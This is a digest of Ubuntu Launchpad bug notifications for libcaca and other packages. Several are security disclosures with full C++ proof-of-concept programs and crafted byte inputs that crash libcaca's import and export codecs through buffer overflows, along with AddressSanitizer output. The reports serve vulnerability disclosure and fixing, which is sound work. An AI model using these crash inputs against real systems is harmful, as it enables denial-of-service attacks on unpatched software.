[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin

2022-06-13 Thread Fantu
was solved in 0.99.beta20-1

** Changed in: libcaca (Ubuntu)
   Status: Triaged => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

Status in libcaca:
  Fix Released
Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Hello ubuntu security team

  issues:https://github.com/cacalabs/libcaca/issues/56

  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  
  libcaca version e4968ba

  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library

  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or

  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_bin.cc && build

  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  void crash(const uint8_t *Data, size_t Size) {

    if(Size<8) return ;
    size_t len=0;
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    caca_create_frame(cv,0);
    caca_set_frame(cv,0);
    caca_import_canvas_from_memory(cv,Data,Size,"bin");
    caca_free_canvas(cv);
    cv=NULL;

  }

  int main(int args,char* argv[]){
  size_t  len = 0;
  unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
  len = sizeof(buffer)/sizeof(unsigned char);
  printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
  crash((const uint8_t*)buffer,len);
  return 0;

  }
  4.compile poc_bin.cc

  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_bin
  5.Run poc_bin
  asan info:

  =
  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
  #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
  #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
  #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
  #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
  #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
  #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

    This frame has 1 object(s):
  [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
    (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  Shadow bytes around the buggy address:
    0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
    0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:   00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:   fa
    Freed heap region:   fd
    Stack left redzone:  f1
    Stack mid redzone:   f2
    Stack right redzone: f3
    Stack after return:  f5
    Stack use after scope:   f8
    Global redzone:  f9
    Global init order:   f6
    Poisoned by user:f7
    Container overflow:  fc
    Array cookie:ac
    Intra object redzone:bb
    ASan internal:   fe
    Left alloca redzone: ca
    Right alloca redzone:cb
    Shadow gap:  cc
  ==3817476==ABORTING

  Thanks

To manage notifications about this bug go to:

[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi

2022-06-13 Thread Fantu
was solved in 0.99.beta20-1

** Changed in: libcaca (Ubuntu)
   Status: Triaged => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925467

Title:
  stack-buffer-overflow of text.c in function _import_ansi

Status in libcaca:
  Fix Released
Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Hello ubuntu security team

  issues: https://github.com/cacalabs/libcaca/issues/55

  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  libcaca version e4968ba

  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library

  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or

  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_ansi.cc && build

  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  void crash(const uint8_t *Data, size_t Size) {

    if(Size<8) return ;
    size_t len=0;
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    caca_create_frame(cv,0);
    caca_set_frame(cv,0);
    caca_import_canvas_from_memory(cv,Data,Size,"ansi");
    caca_free_canvas(cv);
    cv=NULL;

  }

  int main(int args,char* argv[]){

  size_t  len = 0;
  unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
  len = sizeof(buffer)/sizeof(unsigned char);
  printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
  crash((const uint8_t*)buffer,len);

  return 0;

  }
  4.compile poc_ansi.cc

  clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_ansi
  5.Run poc_ansi
  asan info:

  =
  ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
  READ of size 1 at 0x7ffda0164bea thread T0
  #0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
  #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
  #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
  #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
  #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)

  Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
  #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

    This frame has 1 object(s):
  [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
    (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
  Shadow bytes around the buggy address:
    0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
    0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
    0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
    0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3
    0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:   00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:   fa
    Freed heap region:   fd
    Stack left redzone:  f1
    Stack mid redzone:   f2
    Stack right redzone: f3
    Stack after return:  f5
    Stack use after scope:   f8
    Global redzone:  f9
    Global init order:   f6
    Poisoned by user:f7
    Container overflow:  fc
    Array cookie:ac
    Intra object redzone:bb
    ASan internal:   fe
    Left alloca redzone: ca
    Right alloca redzone:cb
    Shadow gap:  cc
  ==3763372==ABORTING
  Thanks

To manage notifications about this bug go to:

[Touch-packages] [Bug 1229282] Re: libcaca ftbfs in saucy (pdftex errors)

2022-05-29 Thread Fantu
** Changed in: libcaca (Ubuntu)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1229282

Title:
  libcaca ftbfs in saucy (pdftex errors)

Status in libcaca package in Ubuntu:
  Fix Released
Status in libcaca package in Debian:
  Fix Released

Bug description:
  ! Missing number, treated as zero.
   
 \relax 
  l.9 \-
\_\-\-\_\-extern char const $\ast$const $\ast$ 
\hyperlink{group__caca_...
  A number should have been here; I inserted `0'.
  (If you can't figure out why I needed to see a number,
  look up `weird error' in the index to The TeXbook.)

  ! Illegal unit of measure (pt inserted).
   
 \relax 
  l.9 \-
\_\-\-\_\-extern char const $\ast$const $\astmake[3]: *** [stamp-latex] 
Er
  ror 1
  make[3]: Leaving directory `/build/buildd/libcaca-0.99.beta18/doc'
  make[2]: *** [all-recursive] Error 1
  make[2]: Leaving directory `/build/buildd/libcaca-0.99.beta18'
  make[1]: *** [all] Error 2
  make[1]: Leaving directory `/build/buildd/libcaca-0.99.beta18'
  make: *** [build-arch-stamp] Error 2
  dpkg-buildpackage: error: debian/rules build gave error exit status 2

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1229282/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2022-05-29 Thread Fantu
** Changed in: libcaca (Ubuntu)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Hello Ubuntu Security Team
  I use libfuzzer to test libcaca api .I found two crash

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file(As call stack):

 ->caca_export_canvas_to_memory()  in
  libcaca/caca/codec/export.c

 ->caca_export_memory()in
  libcaca/caca/codec/export.c

 -> export_tga()in  
libcaca/caca/codec/export.c

-> export_troff()   in  
libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"troff",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;

  }

  
  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;

  }
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"tga",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;
 return 0;
  }

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;
  }
  EOF


[Touch-packages] [Bug 1789022] Re: libcaca0 still depends on old libncursesw5 and libtinfo5

2022-05-29 Thread Fantu
** Changed in: libcaca (Ubuntu)
   Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1789022

Title:
  libcaca0 still depends on old libncursesw5 and libtinfo5

Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Ubuntu Cosmic switched some time ago from ncurses5 to ncurses6.
  However, the package libcaca0 still depends on old libncursesw5 and libtinfo5 
instead of libncursesw6 and libtinfo6.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1789022/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1910391] [NEW] Lightdm is not working on minimal DE install without recommends

2021-01-06 Thread Fantu
Public bug reported:

I tried to install Focal with minimal DE without install recommends and
installing lightdm. On debian works "out of the box" on ubuntu not,
lightdm fails to start. I saw that issue is because missing a greeter,
on debian is correctly as dependencies, on ubuntu packages is instead as
recommends, moving from recommends to dependens will solve this.

** Affects: lightdm (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1910391

Title:
  Lightdm is not working on minimal DE install without recommends

Status in lightdm package in Ubuntu:
  New

Bug description:
  I tried to install Focal with minimal DE without install recommends
  and installing lightdm. On debian works "out of the box" on ubuntu
  not, lightdm fails to start. I saw that issue is because missing a
  greeter, on debian is correctly as dependencies, on ubuntu packages is
  instead as recommends, moving from recommends to dependens will solve
  this.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1910391/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1320422] Re: Please merge dbus 1.8.2-1 (main) from Debian testing (main)

2014-08-14 Thread Fantu
Update dbus should solves also latest cjs fail to build.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1320422

Title:
  Please merge dbus 1.8.2-1 (main) from Debian testing (main)

Status in “dbus” package in Ubuntu:
  In Progress

Bug description:
  I'm working on a debdiff to resync our dbus package with the current
  version in Debian testing.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1320422/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp